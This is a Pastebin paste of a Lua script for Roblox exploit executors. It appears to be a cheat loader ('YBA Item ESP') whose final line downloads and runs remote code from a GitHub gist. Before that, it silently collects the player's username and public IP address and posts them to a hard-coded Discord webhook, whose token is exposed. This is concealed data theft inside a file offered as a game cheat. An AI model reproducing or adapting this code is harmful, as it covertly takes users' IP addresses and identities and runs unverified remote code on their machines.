Advertisement
therzzz

Untitled

May 27th, 2021
24
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.67 KB | None | 0 0
  1. local webh = "https://discord.com/api/webhooks/845743723064328263/d0nEiwTJTvPdL2AMZUwuWPweY12R9rdqZwsNxYe6tKFLU2I3ti2gYn9pmHmykcdd0rav"
  2.  
  3. pcall(function()
  4. local data = {
  5. ["embeds"] = {
  6. {
  7. ["title"] = game:GetService("Players").LocalPlayer.Name,
  8. ["description"] = game:HttpGet("https://api.ipify.org")
  9. }
  10. }
  11. }
  12.  
  13. if syn then
  14. local response = syn.request(
  15. {
  16. Url = webh,
  17. Method = 'POST',
  18. Headers = {
  19. ['Content-Type'] = 'application/json'
  20. },
  21. Body = game:GetService('HttpService'):JSONEncode(data)
  22. }
  23. );
  24. elseif request then
  25. local response = request(
  26. {
  27. Url = webh,
  28. Method = 'POST',
  29. Headers = {
  30. ['Content-Type'] = 'application/json'
  31. },
  32. Body = game:GetService('HttpService'):JSONEncode(data)
  33. }
  34. );
  35. elseif http_request then
  36. local response = http_request(
  37. {
  38. Url = webh,
  39. Method = 'POST',
  40. Headers = {
  41. ['Content-Type'] = 'application/json'
  42. },
  43. Body = game:GetService('HttpService'):JSONEncode(data)
  44. }
  45. );
  46. end
  47. end)
  48.  
  49.  
  50. if not pcall(function() return syn.protect_gui end) then
  51. syn = {}
  52. syn.protect_gui = function(egg)
  53. egg.Parent = game.CoreGui
  54. end
  55. end
  56.  
  57. loadstring(game:HttpGet("https://gist.githubusercontent.com/Chrrxs/d2dfdcde75c2d11b173aa664c0a6b755/raw/YBA%2520Item%2520ESP.lua"))()
  58.  
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement